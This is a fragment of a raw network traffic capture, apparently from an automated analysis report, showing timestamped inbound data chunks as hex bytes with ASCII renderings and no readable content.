94 c2 9b c3 9d c3 a4 c3 88 c3 87 c3 af c2 a9 c3 90 c3 9a c3 83 c3 9c c3 81 c3 89 c2 9d c2 9d c2 89 c2 8c c3 87 c2 a5 2d 0d 2a 23 33 1d 3d 39 24 2c 58 5a 78 0a 2a 2d
                                                                                                                                                                        Data Ascii: -*#3=9$,XZx*-
                                                                                                                                                                        2021-10-28 02:56:05 UTC213INData Raw: c3 b4 c3 af c2 b3 c2 84 c2 b8 c2 b8 c2 bc c2 a4 c3 8d c2 9a c3 9f c2 83 c3 a1 c3 ab c3 a1 c3 91 c3 a5 c3 8c c2 a0 c2 8c c2 88 c2 88 c2 8f c2 94 c2 94 c2 95 c2 a8 c2 a0 c2 9c c3 a5 c2 92 c3 88 c3 a3 c3 82 c2 b8 c2 8c c2 9f c2 90 c2 b7 c2 94 c2 9a c3 a3 c2 96 c3 96 c3 b8 c3 9c c3 b5 c2 b4 c2 b5 c2 b0 c3 a8 c3 84 c3 a8 c3 a8 c3 af c2 92 c3 88 c3 9b c3 a3 c3 b2 c3 bf c3 b5 c3 b4 c2 ac c2 bf c3 97 c3 b5 c3 a5 c3 9e c3 b8 c3 bf c2 85 c2 8a c3 b5 c3 a3 c3 9a c3 ba c3 b1 c3 86 c2 90 c2 ae c2 99 c3 87 c3 b7 c3 a0 c2 ae c3 a0 c3 94 c3 b6 c3 a9 c3 82 c3 82 c3 9d c3 98 c3 9f c2 ac c2 85 c2 8c c3 98 c2 bd c2 ae c3 88 c3 8e c2 a5 c3 87 c3 ab 2e 23 2c 24 31 64 0c 62 76 3b 59 25 00 2d 35 1f 1b 30 3b 3c 09 53 13 4b 14 22 1e 32 10 3b 0e 1c 3c 13 05 35 1e 44 3b 3b 41 6c 3e
                                                                                                                                                                        Data Ascii: .#,$1dbv;Y%-50;<SK"2;<5D;;Al>
                                                                                                                                                                        2021-10-28 02:56:05 UTC216INData Raw: be c2 b2 c2 8c c2 9a c3 8d c2 92 c3 a8 c3 bc c3 91 c3 af c3 9e c3 a7 c3 9f c3 a7 c3 81 c3 93 c3 aa c2 a9 c2 ae c2 aa c3 98 c3 94 c3 8c c2 b8 c3 ab c3 8c c2 ad c2 a6 c3 9a c3 9f c3 ad c3 96 c3 8e c2 b2 c2 9c c3 a5 c3 a2 c3 87 c3 93 c3 ae c3 bc c3 ba c3 97 c3 81 c3 bc c3 89 c3 92 c3 94 c3 9d c2 8e c2 9d c2 9c 16 25 51 23 08 20 16 31 26 3b 24 2c 2c 65 4a 46 05 30 07 1e 3d 4c 01 28 1e 52 3b 34 02 7a 7d 47 33 11 2c 04 13 03 22 27 10 1b 14 0c 0b 5d 59 7a 25 05 01 2a 2a 15 26 0d 03 0b 05 37 1c 45 78 5c 45 71 56 5a 22 18 67 0d 6f 7f 1d 66 69 1e 0f 3d 57 65 70 79 4a 6d 0c 60 40 1a 05 79 52 07 15 26 72 63 69 41 40 5d 61 58 6e 2b 66 5c 4c 08 2a 17 72 30 5b 4f 16 6a 3a 2a 21 7d 6d 54 70 74 08 67 c3 a9 c3 9b c3 8e c3 87 c2 9a c2 a5 c2 bd c2 81 c2 83 c2 bb c2 ab c2 a4
                                                                                                                                                                        Data Ascii: %Q# 1&;$,,eJF0=L(R;4z}G3,"']Yz%**&7Ex\EqVZ"gofi=WepyJm`@yR&rciA@]aXn+f\L*r0[Oj:*!}mTptg
                                                                                                                                                                        2021-10-28 02:56:05 UTC232INData Raw: 91 c3 8f c3 9a c2 be c2 bd c2 a0 c2 96 c2 90 c2 a0 c2 9f c3 95 c3 97 c2 9b c3 8a c2 9e c3 aa c3 98 c2 a7 c3 88 c3 8b c3 86 c3 98 c2 98 c2 89 c3 b5 c3 91 c3 ba c3 a2 c3 bc c3 a1 c3 b9 c3 ba c3 88 c2 bc c2 ac c2 ab c3 91 c3 89 c3 a6 c3 b7 c3 80 c3 b7 c3 93 c3 82 c3 9e c3 93 c3 bd c2 b7 c3 81 c2 8f c2 ac c2 be c3 bf c3 8a c3 b9 c2 bf c3 b0 c3 9f c3 a5 c3 93 c3 8e c3 81 c2 a2 c3 94 c2 b1 c3 b6 c2 b3 c2 86 c3 8b c2 a5 c3 b8 c3 a7 c3 bc 28 33 31 3f 36 2d 05 1e 78 7a 78 0c 3c 07 23 70 0e 59 26 34 10 33 31 22 6c 46 65 09 0e 17 39 3a 26 25 11 0d 16 08 09 3a 40 2d 48 2c 18 0f 04 0b 00 33 09 1d 06 1b 11 10 40 66 7c 10 08 1f 14 33 66 4c 08 6d 66 6b 61 60 30 0e 36 60 78 6f 64 43 76 55 0f 4d 66 7b 71 70 20 3b 5d 5c 47 73 06 41 40 30 41 5d 53 43 47 52 15 30 1a 6c 58 4f
                                                                                                                                                                        Data Ascii: (31?6-xzx<#pY&431"lFe9:&%:@-H,3@f|3fLmfka`06`xodCvUMf{qp ;]\GsA@0A]SCGR0lXO
                                                                                                                                                                        2021-10-28 02:56:05 UTC248INData Raw: a2 c3 b5 c3 b6 c3 86 c2 ac c3 ab c2 8e c3 ba c2 a7 c2 96 c2 a1 c2 90 c2 84 c2 be c2 85 c3 a0 c2 87 c3 82 c3 85 c3 b5 c2 a5 c2 86 c2 bd c2 9d c2 b6 c2 9b c3 b3 c2 82 c3 a3 c3 b5 c2 b1 c3 a3 c3 82 c3 82 c2 96 c2 b1 c3 82 c3 b2 c3 a5 c3 a1 c3 97 c3 aa c3 9e c3 b2 c3 b1 c3 b4 c2 90 c3 b3 c3 83 c3 9b c2 84 c2 a2 c3 a4 c2 93 c3 93 c3 b5 c3 95 c3 b2 c3 b9 c3 ac c3 b3 c3 ac c3 b1 c3 87 c3 86 c2 9a c2 a2 c2 91 c3 92 c3 99 c3 91 c3 85 c3 a5 c3 93 c2 b1 c3 8f c3 9b c3 94 c3 b6 c2 a2 c3 ad c2 a0 c2 83 c3 b6 c3 b0 c2 b3 c3 bd c3 9f c3 b7 c2 a7 c2 a9 c3 9f c3 90 c3 a8 06 5f 26 45 73 77 29 4a 0f 2b 2e 53 18 14 2c 39 16 3b 02 61 77 12 03 2b 2b 37 1e 34 50 2b 22 25 7f 11 1d 68 79 53 21 1d 2c 27 3f 25 0e 1e 34 1f 12 16 07 43 44 4f 19 73 2c 39 3a 17 36 03 35 0f 7e 13 65 3b
                                                                                                                                                                        Data Ascii: _&Esw)J+.S,9;aw++74P+"%hyS!,'?%4CDOs,9:65~e;
                                                                                                                                                                        2021-10-28 02:56:05 UTC264INData Raw: ab c3 aa c3 bd c3 ac c2 93 c2 ad c2 98 c2 b9 c2 98 c2 bd c2 b4 c2 a4 c2 b3 c2 92 c2 b3 c2 bf c2 b1 c3 ad c2 94 c3 bd c2 b7 c2 9c c2 80 c2 98 c2 ac c2 99 c2 83 c2 a2 c2 83 c2 a2 c2 86 c2 8c c2 b3 c3 9d c3 9d c3 9d c2 b7 c2 81 c2 b8 c2 94 c2 9e c2 97 c2 94 c2 84 c2 96 c2 8b c2 94 c2 8d c2 8d c3 95 c3 a1 c3 8d c3 87 c3 b5 c3 a0 c3 a9 c3 8d c3 94 c3 a2 c3 b7 c3 8c c3 bb c3 a4 c3 ac c3 b9 c2 b9 c2 95 c2 b6 c3 b1 c3 85 c3 b0 c3 b9 c3 98 c3 bd c3 b1 c3 8a c3 b0 c3 9e c2 86 c2 92 c2 87 c3 94 c2 89 c2 a8 c3 ad c3 a3 c2 b9 c3 89 c3 a8 c3 8d c3 84 c3 94 c3 86 c3 9b c3 83 c3 84 c3 b1 c2 be c2 a8 c2 b3 c3 b2 c3 a3 c3 90 c3 99 c3 aa c3 95 c3 b8 c2 b2 c3 b4 c3 8b c2 a1 c3 9c c3 89 c2 81 c2 a9 77 2c 36 54 2e 09 2b 13 3b 27 38 20 22 1e 0b 4a 6c 16 26 31 47 19 3e 35 2b 0e
                                                                                                                                                                        Data Ascii: w,6T.+;'8 "Jl&1G>5+
                                                                                                                                                                        2021-10-28 02:56:05 UTC280INData Raw: 63 41 47 5a 69 46 5b 51 46 08 0f 0d 48 48 5f 54 71 c2 a8 c2 a6 c2 b4 c2 86 c2 ae c2 af c2 a1 c2 b2 c3 b8 c3 bf c2 81 c2 bc c2 9f c3 81 c3 8a c3 ad c3 96 c2 86 c3 90 c2 bd c2 9d c2 aa c2 b1 c2 94 c2 9e c3 8c c3 a8 c2 9c c2 a8 c2 bf c2 b0 c2 a5 c3 bd c2 a5 c3 a5 c2 8d c2 b0 c2 89 c2 8f c2 9c c3 88 c3 92 c3 98 c2 81 c2 9d c2 a5 c2 86 c2 a3 c2 93 c2 bd c3 b5 c2 9d c2 a0 c2 99 c2 b7 c2 8c c3 98 c3 82 c3 88 c2 9b c2 b3 c2 b1 c2 96 c2 b3 c3 a8 c3 a3 c3 b1 c3 ae c3 a6 c3 af c3 a6 c3 b1 c2 a8 c2 ae c2 bb c3 8f c3 a8 c3 bb c3 a3 c3 80 c3 a8 c3 a7 c3 a6 c3 be c3 b6 c3 b3 c3 b6 c3 a1 c2 b8 c2 be c2 af c3 9f c3 b8 c3 ab c3 b3 c3 90 c3 98 c3 97 c3 96 c3 8e c3 86 c3 9f c3 86 c3 91 c2 88 c2 8e c2 9d c3 af c3 88 c3 9b c3 83 c3 a0 c3 88 c3 87 c3 86 c3 9e c3 96 c3 8f c3 96
                                                                                                                                                                        Data Ascii: cAGZiF[QFHH_Tq
                                                                                                                                                                        2021-10-28 02:56:05 UTC296INData Raw: 2f 54 6b 47 6e 4e 64 4b 76 46 59 47 50 65 23 27 27 43 6b 48 74 21 66 6a 69 70 69 68 7d 6e 17 3f 1c 48 51 59 43 64 43 4e 5e 66 50 74 72 42 35 07 07 71 47 72 5e 1c 43 34 4a 55 4d c2 aa c2 a6 c2 b7 c3 b7 c3 8f c3 ba c2 b7 c2 99 c2 86 c2 a8 c2 90 c3 8d c2 ac c3 89 c2 a0 c2 ad c2 98 c2 b6 c2 a7 c3 a7 c2 94 c3 a8 c2 83 c2 9a c2 93 c2 bb c2 bd c2 a7 c2 88 c2 84 c2 bc c2 a3 c2 a6 c3 b7 c2 95 c3 93 c3 93 c3 97 c2 b3 c2 95 c2 9b c2 8b c2 b4 c2 8f c2 a9 c2 9b c3 ae c3 b3 c3 b0 c3 b8 c3 a9 c2 b2 c3 af c3 84 c3 9b c2 93 c2 9e c2 9b c2 b6 c2 93 c2 9d c2 b6 c2 84 c2 a7 c3 86 c3 ab c3 9c c2 b1 c2 a4 c3 82 c3 83 c3 b3 c3 aa c3 a3 c3 94 c3 ab c3 99 c3 bb c3 bb c3 9b c2 87 c3 91 c3 b4 c2 a3 c2 a7 c2 a7 c3 b7 c3 aa c3 8c c3 b0 c3 96 c3 a3 c3 bd c3 a6 c3 9b c3 b9 c3 8e c3 85
                                                                                                                                                                        Data Ascii: /TkGnNdKvFYGPe#''CkHt!fjipih}n?HQYCdCN^fPtrB5qGr^C4JUM
                                                                                                                                                                        2021-10-28 02:56:05 UTC312INData Raw: 12 32 3a 66 1d 45 2f 1a 19 0b 29 0a 29 16 3c 2c 2e 29 6a 30 32 2c 24 0e 24 1a 32 1a 10 0d 31 0e 23 1d 08 4e 4c 31 4a 0f 62 66 61 1a 53 51 10 78 6d 6b 78 3a 14 2f 7d 43 71 7d 59 7e 76 63 7b 11 4e 55 41 5b 06 17 66 52 69 4d 50 5f 45 59 47 58 46 48 41 6f 1b 26 66 51 21 5d 60 59 2d 6f 4e 6a 44 57 73 02 37 c3 be c2 94 c2 be c2 b0 c2 9c c2 9b c2 a6 c2 a7 c3 8f c2 b1 c2 8e c2 bd c2 ab c2 b8 c3 be c3 bf c3 ad c2 be c3 9e c2 98 c2 ba c2 b1 c3 87 c2 9b c2 ba c2 9e c2 a6 c3 80 c2 bb c2 a8 c3 ae c3 ae c3 92 c2 92 c2 81 c2 af c2 88 c2 a9 c2 8e c2 85 c2 9b c2 a2 c2 9b c2 86 c2 87 c2 b0 c2 aa c3 95 c3 8a c2 b6 c2 b0 c2 91 c2 9e c2 aa c2 96 c2 a1 c2 88 c3 a4 c2 88 c2 99 c2 9b c2 88 c3 80 c3 b9 c2 ab c3 a0 c3 bb c3 8c c3 b7 c3 8a c3 88 c3 a5 c3 bb c3 a7 c3 b1 c3 b5 c3 b2
                                                                                                                                                                        Data Ascii: 2:fE/))<,.)j02,$$21#NL1JbfaSQxmkx:/}Cq}Y~vc{NUA[fRiMP_EYGXFHAo&fQ!]`Y-oNjDWs7
                                                                                                                                                                        2021-10-28 02:56:05 UTC328INData Raw: bb c3 a6 c3 a4 c3 a6 c3 95 c3 aa c3 9c c2 a5 17 3d 32 3d 03 45 0e 23 3d 79 7a 7a 20 21 2c 50 72 57 5e 4e 1c 49 11 1a 0f 50 7a 61 30 3a 2a 11 1f 09 0c 10 18 1f 3f 11 6a 54 2e 37 45 77 62 34 10 19 10 00 1a 03 30 1d 25 7f 60 49 3b 09 1f 19 67 79 76 06 5a 67 64 60 6f 31 48 2e 50 73 5a 60 5c 77 58 57 59 41 78 70 44 25 2a 58 7f 43 54 7a 6b 69 52 62 4a 61 4b 48 75 60 77 37 40 54 22 2b 12 28 7c 4d 61 65 78 55 46 0d 09 09 7b 49 55 7b c2 bb c2 b2 c2 96 c2 b2 c2 aa c2 b9 c2 9d c2 80 c2 af c3 b1 c3 8d c3 b4 c2 89 c2 bd c2 ac c2 a5 c2 9c c2 bd c2 88 c2 af c2 b9 c2 b4 c2 be c2 82 c2 ad c3 9f c3 aa c3 a1 c2 b0 c2 ba c2 aa c2 a3 c2 9f c2 89 c2 8c c2 90 c3 bd c2 9e c2 8f c2 b4 c2 9d c3 99 c3 9b c3 9d c2 9d c2 90 c2 98 c3 b5 c2 ae c2 91 c2 a4 c2 8d c2 98 c2 83 c2 98 c2 90
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                                                                                                                                                                        2021-10-28 02:56:05 UTC344INData Raw: bf c3 a2 c3 a5 c2 b9 c3 b3 c3 9b c3 bd c3 8d c3 b3 c3 8b c3 bb c3 9b c3 a0 c3 93 c3 b8 c3 b8 c2 b4 c2 a4 c3 a9 c3 a9 c2 86 c2 b2 c3 90 c3 93 c3 82 c2 a1 c3 92 c3 89 c3 90 32 2f 25 13 61 4f 7c 28 49 0b 38 04 02 2f 3d 33 2a 0a 38 06 75 43 64 37 2c 3e 30 17 34 3c 5c 35 06 37 08 05 70 7f 5c 08 64 0c 08 0f 7d 79 33 6b 29 0f 16 06 4a 74 50 25 04 2e 1f 40 10 27 00 27 66 47 68 4d 07 18 37 40 7c 6b 60 30 66 7d 58 0f 0c 07 71 4e 4a 26 1f 66 64 56 75 43 70 69 6a 09 74 25 42 4e 22 12 14 60 58 63 4d 4e 75 69 5b 41 42 5c 5d 60 76 2f 2a 70 45 4b 5b 62 4c 46 78 54 c3 87 c2 b8 c2 9d c2 b6 c3 a4 c3 b6 c3 b4 c2 93 c2 a4 c2 be c3 8e c2 a2 c2 a4 c2 8b c2 b8 c2 8f c3 9a c2 bf c2 b5 c2 a6 c3 a4 c3 a3 c2 8e c2 b8 c3 99 c2 aa c2 a0 c2 97 c2 b4 c2 bf c2 ad c2 81 c2 91 c2 8f c2 94
                                                                                                                                                                        Data Ascii: 2/%aO|(I8/=3*8uCd7,>04<\57p\d}y3k)JtP%.@''fGhM7@|k`0f}XqNJ&fdVuCpijt%BN"`XcMNui[AB\]`v/*pEK[bLFxT
                                                                                                                                                                        2021-10-28 02:56:05 UTC360INData Raw: 93 c2 a9 c2 ac c2 88 c3 9a c3 a2 c3 89 c3 b3 c3 a0 c3 8a c3 9c c3 88 c2 81 c3 b9 c2 9b c2 95 c3 a4 c3 97 c2 a9 c2 a1 c3 a6 c2 a7 c3 a9 c3 83 c3 9f c2 bf c3 ad c3 96 c3 ac c3 9a c3 96 c3 8b c3 98 c2 8e c2 9c c2 82 c3 a4 c3 83 c3 80 c3 92 c2 8e c3 97 c3 85 c3 ba c3 97 c3 be c3 96 c3 93 c3 a0 c3 ba 45 59 29 37 22 2f 0a 2b 02 39 1d 3e 22 29 3b 7f 60 60 0c 56 31 1b 03 4f 4e 0f 02 50 09 36 10 63 68 5f 1e 1b 3d 03 11 03 31 16 3f 15 3b 0a 0f 2e 6b 46 43 05 14 1a 1a 0c 1a 09 06 01 25 01 2e 5c 16 3b 6d 41 49 41 66 4f 44 7a 64 7d 4a 67 43 4e 0b 26 6c 65 75 5c 48 6e 03 47 70 5a 66 7e 6b 2b 3b 16 5c 55 45 6c 5c 36 71 56 7f 55 7b 42 73 6e 0b 0b 67 4f 4f 5f 5f 5c 4d 42 7c 39 56 52 59 0d c3 84 c3 a3 c2 97 c2 b1 c2 aa c2 ac c2 98 c2 aa c2 9d c2 aa c2 83 c2 b9 c2 82 c3 9f
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                                                                                                                                                                        2021-10-28 02:56:05 UTC376INData Raw: a5 c2 b0 c3 bc c3 82 c2 be c3 b8 c2 85 c2 83 c2 bb c3 af c3 96 c2 9a c3 aa c3 b7 c3 ab c3 ab c3 95 c3 97 c2 ae c2 bd c3 85 c3 b3 c2 94 c3 8f c3 9f c3 9f c3 b0 c3 a0 c3 bf c2 92 c3 af c3 a2 c2 83 c3 87 c3 87 c3 87 c3 8e c3 b1 c3 96 c2 9b c3 b9 c3 91 c3 ad c2 a1 c3 81 c3 97 c3 a3 c3 b1 c3 8e c2 be c3 b7 c3 b7 c2 85 c2 a8 c3 a0 c3 88 c3 bf c2 a8 c3 bb c2 b2 c2 a9 c3 83 c3 9e c3 a9 c3 8d c2 9a c2 be c2 82 c3 b7 c2 b1 c3 91 58 7e 0d 4f 3c 03 20 1f 05 34 7e 50 73 32 4b 15 35 0d 0d 5f 09 1c 17 12 51 42 1b 1b 69 62 05 29 18 3d 12 0f 6e 00 17 09 0d 1c 5a 58 5d 0f 1a 2a 1c 1b 6a 3f 01 1b 04 19 1c 1e 42 7c 5b 3a 0a 19 6a 4d 6e 49 70 1a 5b 7a 76 6e 32 0f 33 3d 6b 61 02 5d 7a 72 6f 53 1d 17 51 44 5b 28 2e 5a 6e 45 47 4b 7c 41 54 4b 54 4b 48 6a 17 32 2e 6a 5a 4d 5a 78
                                                                                                                                                                        Data Ascii: X~O< 4~Ps2K5_QBib)=nZX]*j?B|[:jMnIp[zvn23=ka]zroSQD[(.ZnEGK|ATKTKHj2.jZMZx
                                                                                                                                                                        2021-10-28 02:56:05 UTC392INData Raw: 9e c2 a5 c3 9e c3 91 c2 a0 c2 98 c2 a3 c2 8d c2 9c c3 ae c2 a9 c3 ab c2 a3 c2 b5 c3 b1 c3 bb c2 af c3 a6 c3 86 c3 95 c2 99 c2 9b c2 8b c2 93 c2 b7 c2 94 c2 9c c2 85 c3 bf c2 8b c2 9b c3 ad c2 98 c3 8d c2 93 c2 bc c3 a6 c2 92 c2 9e c3 aa c3 a5 c2 9c c3 8a c3 b5 c3 89 c2 94 c3 8a c3 9b c3 a6 c2 b4 c2 a6 c2 a4 c3 82 c3 a4 c2 8a c3 a7 c3 9d c3 a6 c3 89 c3 a8 c3 b1 c3 96 c3 a7 c3 88 c3 ad c3 a5 c2 90 c3 a1 c3 a2 c3 aa c3 8b c3 80 c3 a7 c3 8a c3 a9 c3 90 c3 a3 c3 b5 c2 b1 c2 bb c3 af c2 a6 c2 86 c2 95 c3 99 c3 87 c3 b1 c3 90 c3 b7 c3 94 c3 9f c3 9c 1b 19 0e 29 23 7d 64 7c 0d 48 3d 21 25 26 59 2d 37 56 3c 34 21 65 65 65 1a 5b 1b 39 67 36 17 03 0e 03 0e 03 27 5c 45 58 2a 6b 13 08 20 11 27 72 27 76 09 14 24 61 69 32 3a 1d 18 11 30 11 34 01 55 19 44 60 09 03 3d 35
                                                                                                                                                                        Data Ascii: )#}d|H=!%&Y-7V<4!eee[9g6'\EX*k 'r'v$ai2:04UD`=5
                                                                                                                                                                        2021-10-28 02:56:05 UTC408INData Raw: bf c3 a7 c2 9a c3 85 c2 91 c2 a7 c2 b6 c2 bf c2 88 c2 b7 c2 8f c2 88 c2 bf c2 ae c2 b1 c2 b2 c2 8d c2 96 c3 80 c3 93 c2 bc c3 ae c2 88 c3 ba c2 9c c2 8f c3 b3 c2 9a c2 84 c2 97 c2 b0 c2 ba c2 af c3 93 c3 a5 c3 92 c2 b5 c2 87 c2 93 c2 ac c2 b2 c3 a9 c2 b1 c2 9a c2 91 c2 bf c2 92 c2 9a c3 bc c3 b6 c2 8b c3 86 c2 b6 c3 b7 c2 9f c3 af c3 8a c3 a1 c3 98 c3 ad c3 82 c3 b4 c2 8c c2 9a c3 bf c2 bf c2 a3 c2 a3 c3 95 c3 ae c3 a1 c2 8d c3 a3 c3 91 c3 9d c2 9a c3 b0 c3 a9 c3 b2 c3 ba c3 ab c2 8c c2 b8 c2 b5 c3 a0 c3 a1 c3 86 c3 8f c3 b8 c3 87 c2 bb c3 b8 c3 87 c2 a8 c3 aa c3 8d c2 a8 c3 ad c2 90 c2 ab c3 b0 c3 be c3 94 c3 96 c3 ba c3 9c c3 9a c3 8a c3 94 c3 8d c3 ba c3 95 c3 9c 72 62 56 16 38 57 20 00 25 28 15 20 4c 5b 25 31 65 62 71 1e 34 27 16 13 3e 1d 5f 1c 40 5d
                                                                                                                                                                        Data Ascii: rbV8W %( L[%1ebq4'>_@]
                                                                                                                                                                        2021-10-28 02:56:05 UTC424INData Raw: 5d 47 5b 40 71 52 3c 3e 2e 1d 58 24 33 c3 84 c2 9f c2 a2 c2 8c c2 b3 c2 a0 c2 b0 c2 aa c2 a7 c2 95 c3 98 c3 bb c2 8f c2 80 c2 90 c2 95 c2 b7 c2 a4 c2 90 c2 99 c2 ac c2 9d c3 9c c2 b9 c2 b4 c2 ac c3 aa c3 ab c3 a6 c2 b1 c2 b9 c2 aa c2 a6 c2 a8 c2 8a c2 8d c2 97 c2 b2 c2 ba c2 98 c2 a1 c2 9e c3 8a c3 98 c3 9e c2 aa c2 8e c2 a1 c2 97 c2 86 c2 ae c2 b8 c2 9e c3 b5 c3 aa c3 af c3 b1 c2 9e c3 82 c3 bd c3 8a c2 b1 c2 8e c2 9e c3 a2 c3 a4 c3 88 c3 a2 c2 87 c3 a3 c3 a0 c3 85 c3 a2 c3 a9 c2 93 c2 bb c2 b6 c3 a1 c3 ad c3 bd c3 90 c3 8d c3 b4 c3 97 c3 80 c3 9c c3 83 c2 97 c2 91 c3 84 c3 93 c2 81 c2 a6 c3 b2 c2 9b c3 ad c3 a0 c3 bd c3 8e c3 a9 c3 90 c3 bd c3 9d c3 9d c3 86 c3 b4 c3 a3 c2 91 c2 af c3 aa c3 8a c3 9d c3 9a c3 bd c3 9e c3 83 c3 8a c3 b8 c3 86 c3 89 c2 ae
                                                                                                                                                                        Data Ascii: ]G[@qR<>.X$3
                                                                                                                                                                        2021-10-28 02:56:06 UTC440INData Raw: 13 41 13 4d 14 44 71 6b 61 6c 52 73 2d 12 30 28 64 4f 09 3e 1b 16 6b 78 5a 39 60 43 1d 22 32 18 29 53 49 6e 3d 65 2c 59 47 74 59 52 07 15 2b 7a 74 5b 55 7b 50 5c 5d c2 aa c2 a3 c2 ae c3 91 c2 b1 c3 a5 c3 b5 c3 b5 c2 8f c2 b3 c2 9a c2 a3 c2 8c c3 9c c2 af c2 b4 c2 96 c3 92 c2 8a c2 9e c2 b1 c3 a1 c3 83 c3 9e c2 a4 c2 a3 c2 9e c2 91 c2 b8 c2 a5 c2 b4 c2 ac c2 9c c2 9b c2 b8 c2 a6 c2 9a c3 9f c3 95 c3 95 c2 af c2 9d c2 8b c2 89 c2 86 c3 bc c2 9f c2 8c c2 8e c2 94 c3 a4 c2 97 c2 98 c3 af c3 82 c3 a0 c2 af c2 9a c2 a1 c2 b6 c2 a9 c2 b8 c3 ae c2 89 c3 95 c3 bf c3 95 c3 ac c3 97 c3 9f c2 83 c2 9b c3 9d c3 b5 c2 98 c3 b5 c3 8b c3 a0 c3 85 c3 b4 c3 87 c2 92 c3 ac c3 9e c3 af c2 b4 c3 8b c3 8b c2 b1 c2 83 c2 96 c3 9f c3 b8 c3 a5 c3 bc c3 ac c3 8e c3 9b c3 95 c3 84
                                                                                                                                                                        Data Ascii: AMDqkalRs-0(dO>kxZ9`C"2)SIn=e,YGtYR+zt[U{P\]
                                                                                                                                                                        2021-10-28 02:56:06 UTC456INData Raw: 2d 4b 71 79 24 36 04 04 03 79 7b 1d 2d 67 06 27 70 36 30 2a 5a 76 31 37 3b 10 1b 09 62 7c 18 11 21 23 25 15 31 60 6f 6c 59 68 5c 76 12 70 75 11 14 17 48 55 5d 60 77 7c 5b 7e 4e 4b 53 00 59 7d 4f 00 6a 13 4c 28 5c 44 43 39 25 77 37 77 57 49 5a 08 1b 00 51 54 7f 59 5f 66 4b 4e 70 5b 74 50 4a c3 86 c3 ba c3 b0 c2 84 c2 b0 c2 a4 c2 a4 c2 a0 c2 b0 c2 bd c2 96 c2 a3 c2 ae c2 a3 c2 a9 c2 a8 c3 8e c3 8e c3 a4 c3 ac c3 8a c2 91 c2 b8 c2 9b c2 b0 c2 b8 c2 a1 c2 9e c2 be c2 a4 c2 97 c2 a2 c3 90 c3 92 c3 90 c2 b6 c2 be c2 ab c2 88 c3 93 c3 ae c2 ad c2 9d c2 85 c2 9e c2 80 c2 81 c2 b2 c2 b1 c3 8e c3 88 c2 a6 c2 88 c2 a2 c2 94 c2 b9 c2 9d c2 9b c2 8a c2 87 c2 86 c2 bf c2 88 c2 be c2 b0 c2 90 c2 b0 c3 84 c3 be c3 95 c3 ae c3 87 c3 92 c3 a8 c3 ba c3 8d c3 be c3 b3 c3 83
                                                                                                                                                                        Data Ascii: -Kqy$6y{-g'p60*Zv17;b|!#%1`olYh\vpuHU]`w|[~NKSY}OjL(\DC9%w7wWIZQTY_fKNp[tPJ
                                                                                                                                                                        2021-10-28 02:56:06 UTC472INData Raw: a5 c2 a8 c2 a5 c3 bf c3 be c3 82 33 5f 1a 32 36 3b 3a 2d 12 2a 4d 56 7f 78 09 3b 30 30 0c 3d 25 2d 10 51 23 1a 3b 6b 7b 6f 19 2f 2a 06 0a 21 05 1a 06 7b 7e 05 1a 2a 52 31 3b 13 0b 75 1b 1f 0d 0e 30 75 1d 0e 1a 43 78 46 2b 03 57 67 45 6f 63 58 45 58 44 6c 7f 3f 13 32 64 74 06 6b 5d 6b 76 66 6d 6d 43 7c 7f 2f 07 22 4b 46 41 47 64 32 63 5e 63 46 56 3a 28 10 14 06 69 7d 51 50 56 2e 6d 62 4c 45 42 5e 4f 0f 27 02 40 3a c2 84 c2 9a c2 aa c2 bf c2 a5 c2 b5 c2 91 c3 84 c2 b2 c2 ae c2 bf c3 bb c3 bf c3 bf c2 89 c2 b5 c2 80 c2 8b c2 8e c2 a3 c2 83 c2 a1 c2 b8 c2 ad c2 af c2 be c2 8a c3 b8 c3 a7 c2 9a c2 89 c2 87 c2 af c3 bb c2 ab c2 9f c2 8f c2 9f c2 9b c2 85 c2 85 c2 9d c2 9f c3 9b c3 9f c3 9f c2 9d c2 9c c2 96 c2 9b c2 be c2 9b c2 95 c2 89 c2 b1 c2 a2 c3 ae c3 ae
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                                                                                                                                                                        2021-10-28 02:56:06 UTC484INData Raw: 06 6f 0c 65 6a 61 7c 25 48 0f 0b 08 6c 3d 4d 66 76 68 71 4e 63 6a 2f 3c 37 62 68 6b 53 6c 7b 7e 66 0f 63 60 0a 01 1c 45 28 6f 6b 28 4c 58 6d 46 56 48 51 6e 43 4a 0f 1c 17 42 48 4b 49 4c 5b 5e 46 2f 41 25 2a 21 3c 65 08 4f 4b c3 88 c2 ac c2 be c2 8d c2 a6 c2 b6 c2 a8 c2 b1 c2 8e c2 a3 c2 aa c3 af c3 bc c3 b7 c2 a2 c2 a8 c2 a4 c3 91 c2 ac c2 bb c2 be c2 a6 c3 8f c2 a0 c2 a0 c3 8a c3 81 c3 9c c2 85 c3 a8 c2 af c2 ab c3 a8 c2 8c c2 84 c2 ad c2 86 c2 96 c2 88 c2 90 c2 8b c2 8e c2 8d c3 93 c3 aa c3 bd c2 a2 c2 9c c2 91 c2 93 c2 96 c3 a8 c2 a0 c2 ac c2 8e c2 81 c2 be c2 93 c2 aa c3 89 c3 9c c3 a9 c2 ab c2 83 c3 b3 c3 af c3 86 c3 af c3 a1 c3 91 c3 b8 c3 a2 c2 92 c3 ad c3 a6 c2 af c2 b8 c2 9d c3 90 c2 82 c3 bd c3 b3 c3 9e c2 95 c3 93 c3 ae c3 93 c3 b2 c2 8f c3 bc
                                                                                                                                                                        Data Ascii: oeja|%Hl=MfvhqNcj/<7bhkSl{~fc`E(ok(LXmFVHQnCJBHKIL[^F/A%*!<eOK
                                                                                                                                                                        2021-10-28 02:56:06 UTC500INData Raw: 29 26 12 2e 1a 23 2d 28 0a 22 57 60 47 7b 70 40 41 3e 3a 21 2d 39 07 14 25 0e 2b 3c 7c 2e 15 29 67 68 2d 7e 38 0b 34 19 2b 39 0c 40 64 5a 2d 0e 73 65 24 15 2b 55 7a 78 1c 64 58 42 2c 38 4e 73 47 63 41 66 6d 63 6d 68 4a 62 17 22 3f 1d 30 00 01 7e 3f 0f 72 5b 69 29 6f 41 42 1e 05 6c 6a 57 44 5d 74 4e 79 45 7f 40 4d 53 40 02 3c 05 6b 4c 49 60 63 5e 2c c2 a4 c2 b4 c2 81 c2 b5 c2 a1 c2 b0 c3 b2 c3 9c c3 b5 c2 a5 c2 98 c2 a9 c2 ac c2 81 c2 a6 c2 a8 c2 8d c2 bd c2 92 c2 9f c2 b0 c2 a0 c3 ae c3 bd c3 aa c2 bb c2 be c2 8a c2 bf c2 b8 c2 99 c2 bd c2 99 c2 8f c2 90 c2 8d c2 85 c2 90 c3 96 c3 94 c3 9a c2 bc c2 96 c2 bc c3 bf c2 aa c2 8f c2 a4 c2 8b c2 b7 c3 b1 c2 ab c2 b9 c2 96 c3 82 c3 a2 c3 